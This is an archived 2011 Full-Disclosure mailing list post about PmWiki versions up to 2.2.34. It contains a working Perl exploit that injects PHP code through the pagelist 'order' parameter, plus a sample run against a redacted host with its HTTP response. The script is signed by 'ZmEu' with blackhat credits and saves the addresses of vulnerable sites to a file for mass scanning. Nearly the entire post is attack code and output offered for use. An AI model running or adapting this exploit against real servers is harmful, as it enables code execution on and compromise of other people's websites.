lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <DUB101-W28EA6EE10219F3D9F1BEC1D6A30@phx.gbl> Date: Thu, 15 Dec 2011 17:49:18 +0200 From: foo net <foonet@...mail.com> To: <full-disclosure@...ts.grok.org.uk> Subject: PmWiki <= 2.2.34 (pagelist) $ perl test.pl http://x.x.x.x/pmwiki/pmwiki.php (@)OK:http://x.x.x.x/pmwiki/pmwiki.php HTTP/1.1 200 OK Connection: close Date: Thu, 15 Dec 2011 15:40:59 GMT Server: Apache/2.2.20 (Unix) mod_ssl/2.2.20 OpenSSL/0.9.8r DAV/2 PHP/5.3.6 Content-Length: 17 Content-Type: text/html Client-Date: Thu, 15 Dec 2011 15:40:58 GMT Client-Peer: x.x.x.x:80 Client-Response-Num: 1 Set-Cookie: author=deleted; expires=Wed, 15-Dec-2010 15:40:58 GMT; path=/ X-Powered-By: PHP/5.3.6 ZmEu 0.1 - pmwiki <-- work/got it... $ Huh.. $ cat test.pl #!/usr/bin/perl -w # # *** Autor: ZmEu # *** Multumiri: haxnet, foonet si blackhat(s). # *** Testat pe: Mac(darwin 8.11.0). # # \"You may stop me, but you can\'t stop us all.\". # use LWP::UserAgent; my $adresa=$ARGV[0] or die("(@)Se foloseste: perl pmwiki.pl http://victima.tld/pmwiki/pmwiki.php\n"); my $incarca="chr%2890%29.chr%28109%29.chr%2869%29.chr%28117%29.chr%2832%29.chr%2848%29.chr%2846%29.chr%2849%29.chr%2832%29.chr%2845%29.chr%2832%29.chr%28112%29.chr%28109%29.chr%28119%29.chr%28105%29.chr%28107%29.chr%28105%29"; $ua=new LWP::UserAgent; $ua->agent("ZmEu/1.0"); my $pmwikireq=new HTTP::Request POST => $adresa; $pmwikireq->content_type("application/x-www-form-urlencoded"); $pmwikireq->content("action=edit&n=Cmd.foo&text=%28%3Apagelist+order%3D%27%5D%29%3Berror_reporting%280%29%3Bprint%28$incarca%29%3Bdie%3B%23%3A%29&csum=&author=foo&preview=+Preview+"); my $pmwikires=$ua->request($pmwikireq); my $zmeu=$pmwikires->as_string; if($zmeu=~/ZmEu 0.1 - pmwiki/) { print "(@)OK:$adresa\n"; open(PMWIKIVULN, ">>vuln.txt"); print PMWIKIVULN ("$adresa\n"); close PMWIKIVULN; } else { print "BAD:$adresa\n"; #este nevoie de parola. } $ _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists